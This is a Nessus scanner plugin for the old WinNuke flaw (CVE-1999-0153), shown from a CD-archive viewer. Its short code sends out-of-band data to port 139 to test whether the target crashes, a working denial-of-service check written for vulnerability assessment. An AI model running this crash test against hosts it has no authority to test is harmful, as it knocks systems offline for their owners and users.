home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / winnuke.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  2.7 KB  |  103 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10314);
  10.  script_bugtraq_id(2010);
  11.  script_version ("$Revision: 1.18 $");
  12.  script_cve_id("CVE-1999-0153");
  13.  
  14.  name["english"] = "Winnuke";
  15.  name["francais"] = "Winnuke";
  16.  name["deutsch"] = "Winnuke";
  17.  script_name(english:name["english"], francais:name["francais"], deutsch:name["deutsch"]);
  18.  
  19.  desc["english"] = "It was possible to crash
  20. the remote host using the 'Winnuke' attack,
  21. that is to send an OOB message to this port.
  22.  
  23. An attacker may use this flaw to make this
  24. host crash continuously, preventing the
  25. system from working properly.
  26.  
  27.  
  28. Solution : upgrade your operating system.
  29.  
  30. Risk factor : High";
  31.  
  32.  
  33.  desc["francais"] = "Il a ΘtΘ possible de
  34. faire planter la machine distante en
  35. utilisant l'attaque 'Winnuke', qui consiste
  36. α envoyer un message OOB α ce port.
  37.  
  38. Un pirate peut utiliser ce problΦme pour
  39. faire planter continuellement cette 
  40. machine, vous empechant ainsi de travailler
  41. correctement.
  42.  
  43.  
  44. Solution : mettez α jour votre systΦme
  45. d'exploitation
  46.  
  47. Facteur de risque : ElevΘ";
  48.  
  49.  desc["deutsch"] = "Es war m÷glich, den ⁿberprⁿften Rechner durch 
  50. senden einer OOB_MSG an den entsprechenden Port, auch 
  51. als 'Winnuke' Attacke bekannt, abstⁿrzen zu lassen.
  52.  
  53. Ein Angreifer kann diese Methode benutzen um den Host
  54. kontinuierlich abstⁿrzen zu lassen, was ein produktives
  55. Arbeiten verhindern kann.
  56.  
  57. L÷sung: Installieren Sie dementsprechende Updates fⁿr dieses Betriebssystem
  58.  
  59. Risikofaktor: Hoch";
  60.  
  61.  script_description(english:desc["english"], francais:desc["francais"], deutsch:desc["deutsch"]);
  62.  
  63.  summary["english"] = "MSG_OOB against the remote host";
  64.  summary["francais"] = "MSG_OOB sur la machine distante";
  65.  summary["deutsch"] = "MSG_OOB gegen den entfernten Rechner";
  66.  script_summary(english:summary["english"], francais:summary["francais"], deutsch:summary["deutsch"]);
  67.  
  68.  script_category(ACT_KILL_HOST);
  69.  
  70.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  71.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison",
  72.         deutsch:"Dieses Skript ist urheberrechtlich geschⁿtzt (C) 1999 Renaud Deraison");
  73.  family["english"] = "Denial of Service";
  74.  family["francais"] = "DΘni de service";
  75.  family["deutsch"] = "Denial of Service";
  76.  
  77.  script_family(english:family["english"], francais:family["francais"], deutsch:family["deutsch"]);
  78.  script_require_ports(139);
  79.  exit(0);
  80. }
  81.  
  82. #
  83. # The script code starts here
  84. #
  85.  
  86. port = 139;
  87. if(get_port_state(port))
  88. {
  89.  soc = open_sock_tcp(port);
  90.  if(soc)
  91.  {
  92.   start_denial();
  93.   data = "you are dead";
  94.   send(socket:soc,data:data, option:MSG_OOB);
  95.   close(soc);
  96.   alive = end_denial();
  97.   if(!alive){
  98.           security_hole(port);
  99.         set_kb_item(name:"Host/dead", value:TRUE);
  100.         }
  101.  }
  102. }
  103.